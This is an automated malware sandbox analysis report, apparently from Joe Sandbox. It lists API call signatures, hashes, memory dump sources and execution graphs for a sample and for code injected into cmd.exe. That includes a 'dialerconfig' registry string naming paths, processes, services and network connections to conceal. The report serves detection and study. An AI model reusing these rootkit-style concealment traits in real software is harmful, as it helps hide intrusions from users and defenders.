                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                            • Opcode ID: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                                                                                                                            • Instruction ID: cffff5f7b9c0935c1a9d395a3441baf09a046b8502ee22e6347dc4a3a4c21394
                                                                                                                                                            • Opcode Fuzzy Hash: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                                                                                                                            • Instruction Fuzzy Hash: 5C616E3290CB8582E7619F15E4403AEB7A0FB85B98F044227EB9D83B59DF7DD1A5CB00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                            • Opcode ID: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                                                                                                                            • Instruction ID: 506d0bf530572fde98917ddec18e10ed48b3519e0b3efb42c57fa52aeaf3378c
                                                                                                                                                            • Opcode Fuzzy Hash: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                                                                                                                            • Instruction Fuzzy Hash: 29514932E0C68286EB648B25944436DB7A0AF55B9CF148137DE8D87BD5CF3DE4B18B05
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: %s%s: %s$Fatal error detected
• API String ID: 1878133881-2410924014
• Opcode ID: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
• Instruction ID: 83ee586107c6a8616789e74b047895c6c5fb83dacaaa1b1b819c25040e2bf870
• Opcode Fuzzy Hash: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
• Instruction Fuzzy Hash: C0315672A2C68181E620DB14E4516EE6364FF84BC8F804137E78D87A99DF3DD615CB40
APIs
  • Part of subcall function 00007FF6D6E98DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98E1A
• CreateFileW.KERNEL32(00000000,?,?,00007FF6D6E93FB9,?,00007FF6D6E939CA), ref: 00007FF6D6E943A8
• GetFinalPathNameByHandleW.KERNEL32(?,?,00007FF6D6E93FB9,?,00007FF6D6E939CA), ref: 00007FF6D6E943C8
• CloseHandle.KERNEL32(?,?,00007FF6D6E93FB9,?,00007FF6D6E939CA), ref: 00007FF6D6E943D3
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: Handle$ByteCharCloseCreateFileFinalMultiNamePathWide
• String ID: \\?\
• API String ID: 2226452419-4282027825
• Opcode ID: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
• Instruction ID: fa55199dc07cb752c042f53665910cc129f0a426e2717cee560661c730da60c9
• Opcode Fuzzy Hash: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
• Instruction Fuzzy Hash: 1621A272F1C65185EB209B25F8543AE6351AF88B98F440233DF4D83A94EF3ED969CB00
APIs
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
• Instruction ID: eed6f7ab17a69488550bd32c158ca24868ba72ac8f20f4a7a43387829d3d321f
• Opcode Fuzzy Hash: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
• Instruction Fuzzy Hash: 98D1FF72F0CA8189E711CF69C4846EC37B5FB44B98B044236DE5E97B99DE39E42AC340
APIs
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
• Instruction ID: 437e0589c950ca0a6cff6a9818abb7fe16c805beb34d744b3feb12fa35067270
• Opcode Fuzzy Hash: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
• Instruction Fuzzy Hash: 2A518D26E0C6418AFB10DFB0D8507BD3BB1AB59B58F108536DE0D8B68ADF39D5A98740
APIs
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode ID: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
• Instruction ID: bb1c4210cc2d2a9e87024529a3afef3aa33e19936c1d056c19d0cd68258ee093
• Opcode Fuzzy Hash: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
• Instruction Fuzzy Hash: CD11A921E2C24346FB54D779F54C2BD1251EF88BC4F848033DA4986B99CE2ED4E59600
APIs
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
• Instruction ID: 685b63908f5acec67ebe59c93b5151b19ac5410847dd88128ee37a53b9ca15b3
• Opcode Fuzzy Hash: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
• Instruction Fuzzy Hash: EE111822F18F058AEB008F64E8552AC33A4FB19B58F441E32DE6D867A4EF78D564C340
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 8b6f824ce68226522039b5681d667a4258c25c0b371a8f4ef00d3752ae492e10
• Instruction ID: 3450054e8289e33f7b8383730dbb5458860a2ee41ddb3e4e8d4ea075d8be0c15
• Opcode Fuzzy Hash: 8b6f824ce68226522039b5681d667a4258c25c0b371a8f4ef00d3752ae492e10
• Instruction Fuzzy Hash: 47410512E1C78246FB249B29A4457BE7760EB80BA4F144236EF5C86AD9DE3ED461CB00
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EA9DFA
  • Part of subcall function 00007FF6D6EAB700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB716
  • Part of subcall function 00007FF6D6EAB700: GetLastError.KERNEL32(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB720
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6D6E9C335), ref: 00007FF6D6EA9E18
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Local\Temp\main.exe
• API String ID: 2553983749-1502169466
• Opcode ID: 2dc50b8d6a573f30b306f0085b97da4955317f93722b68647fdb996873f18b46
• Instruction ID: a7dcda30a1f6a29f9825e0a4e8a0faec67b3ec5399aed4d6f2fec20a275af139
• Opcode Fuzzy Hash: 2dc50b8d6a573f30b306f0085b97da4955317f93722b68647fdb996873f18b46
• Instruction Fuzzy Hash: 5941AB36E1CB0286EB14DF25E4808FD26A4EB84BD4F554037EA0EC7B95DE3EE4A18340
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
• Instruction ID: c2ccbcedab8b029fe11711cd08b27cfdf0e93c84812792f0abc1838f9f20f064
• Opcode Fuzzy Hash: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
• Instruction Fuzzy Hash: 2A41BF72B1CA8185DB208F25E8447AEA7A1FB88B94F804132EE4DC7798EF3DD455C740
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: 5f6034cdb323e25da13304688bcfaa40664c8172194540dca50913ba3db948d1
• Instruction ID: b2c7458ce1438c45a6a91400602e214a436b48df6839a809a10d624fe62ffbc5
• Opcode Fuzzy Hash: 5f6034cdb323e25da13304688bcfaa40664c8172194540dca50913ba3db948d1
• Instruction Fuzzy Hash: 3E21E472F0C78181EB249B19D44426D73B2FB84B88F498137DA8D87284DF7EE958C751
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Error detected
• API String ID: 1878133881-3513342764
• Opcode ID: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
• Instruction ID: 7ca4dcc458003163edb0fe672e6fa8ec45f68a4337619ae79924bb626c001ee7
• Opcode Fuzzy Hash: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
• Instruction Fuzzy Hash: 4F219572A2C68181EB20DB14F4516EEB364FF94788F801137EA8D87A69DF3DD625CB40
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Fatal error detected
• API String ID: 1878133881-4025702859
• Opcode ID: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
• Instruction ID: 5d9da8b6c21ba14ffc1c511db85bf3f57d846406713136e4af26ddd60b49cccd
• Opcode Fuzzy Hash: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
• Instruction Fuzzy Hash: DE217172A2C68281EB20DB14E4516EEA364FF94788F801137E78D87A69DF3DD625CB50
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
• Instruction ID: 53f7004be06a3e41387cd6e12dd7cc4acee0d94066415adc46f5d2c26f2be71b
• Opcode Fuzzy Hash: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
• Instruction Fuzzy Hash: A0112B32A1CB8582EB218B15F44026D77E5FBC8B98F584231DA8D47B65DF3DD5A1CB00
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
• Instruction ID: f09ec0eea95d6ca09f9550f4f1675dd310b61ed535d157290bc9e115835d6a5e
• Opcode Fuzzy Hash: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
• Instruction Fuzzy Hash: 6901F761D1C30282FB20AF6494512BE63A0EF44744F801037E54EC6285EF3DD564C714

Execution Graph

Execution Coverage: 1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 250
Total number of Limit Nodes: 9
RegCloseKey 15096->15100 15101 230d92112bc 11 API calls 15097->15101 15102 230d9211826 RegOpenKeyExW 15098->15102 15103 230d921180f 15098->15103 15099->15090 15100->15092 15104 230d92117e1 RegCloseKey 15101->15104 15106 230d9211861 RegOpenKeyExW 15102->15106 15107 230d921184a 15102->15107 15105 230d921104c 4 API calls 15103->15105 15104->15098 15110 230d921181c RegCloseKey 15105->15110 15108 230d9211885 15106->15108 15109 230d921189c RegCloseKey 15106->15109 15111 230d921104c 4 API calls 15107->15111 15112 230d921104c 4 API calls 15108->15112 15109->15082 15110->15102 15113 230d9211857 RegCloseKey 15111->15113 15114 230d9211892 RegCloseKey 15112->15114 15113->15106 15114->15109 15160 230d92114a4 15115->15160 15154 230d9226168 15132->15154 15134 230d9211283 GetProcessHeap 15135 230d92112ae __free_lconv_mon 15134->15135 15135->15073 15137 230d92111b5 RegCloseKey 15136->15137 15138 230d92110bf 15136->15138 15137->15087 15138->15137 15139 230d92110cf RegEnumValueW 15138->15139 15141 230d9211125 __free_lconv_mon 15139->15141 15140 230d921114e GetProcessHeap 15140->15141 15141->15137 15141->15139 15141->15140 15142 230d921116e GetProcessHeap 15141->15142 15142->15141 15144 230d9211327 GetProcessHeap 15143->15144 15145 230d921148a __free_lconv_mon 15143->15145 15148 230d921133e __free_lconv_mon 15144->15148 15145->15088 15146 230d9211352 RegEnumValueW 15146->15148 15147 230d9211476 GetProcessHeap 15147->15145 15148->15146 15148->15147 15150 230d92113d3 GetProcessHeap 15148->15150 15151 230d921141e lstrlenW GetProcessHeap 15148->15151 15152 230d9211443 StrCpyW 15148->15152 15153 230d92113f3 GetProcessHeap 15148->15153 15155 230d921152c 15148->15155 15150->15148 15151->15148 15152->15148 15153->15148 15158 230d9211546 15155->15158 15159 230d921157c 15155->15159 15156 230d9211565 StrCmpW 15156->15158 15157 230d921155d StrCmpIW 15157->15158 15158->15156 15158->15157 15158->15159 15159->15148 15161 230d92114e1 GetProcessHeap 15160->15161 15162 230d92114c1 GetProcessHeap 
15160->15162 15166 230d9226180 15161->15166 15163 230d92114da __free_lconv_mon 15162->15163 15163->15161 15163->15162 15167 230d9226182 15166->15167

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-2879589442
• Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction ID: a4898b9ddb79ab63c2fd01afc388a7b2ff027f7be92fc7101da2243cc42138c5
• Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction Fuzzy Hash: 9F712B36A11B5886EB909FA1E8E9AA933F4F784B88F001112DD4E57B6DDF3CC654C354

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
• Instruction ID: 8c9c8e134c0f66cf40b6b4492ffc8d35df17761a32da757294729dd767992b37
• Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
• Instruction Fuzzy Hash: 09112A21E14B8E82FBE0ABE1B8ED77A22F5F754344F50412999065159DEF7CC3688278

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: a07d0c2e6d1ea39fb6922406f7202b79799826504b1902530f517849248bbcbd
• Instruction ID: 717a6422028dbd0011ff7efc3e71b886950c08bc739e98b716fae0c06884ecd4
• Opcode Fuzzy Hash: a07d0c2e6d1ea39fb6922406f7202b79799826504b1902530f517849248bbcbd
• Instruction Fuzzy Hash: 3531B832B10B4891D7A09B5495E82B86AF0F345BB0F681309DB7A173E8CB3CD671D350

Control-flow Graph

APIs
  • Part of subcall function 00000230D9211628: GetProcessHeap.KERNEL32 ref: 00000230D9211633
  • Part of subcall function 00000230D9211628: HeapAlloc.KERNEL32 ref: 00000230D9211642
  • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D92116B2
  • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D92116DF
  • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D92116F9
  • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D9211719
  • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D9211734
  • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D9211754
  • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D921176F
  • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D921178F
  • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D92117AA
  • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D92117CA
• Sleep.KERNEL32 ref: 00000230D9211AD7
• SleepEx.KERNEL32 ref: 00000230D9211ADD
  • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D92117E5
  • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D9211805
  • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D9211820
  • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D9211840
  • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D921185B
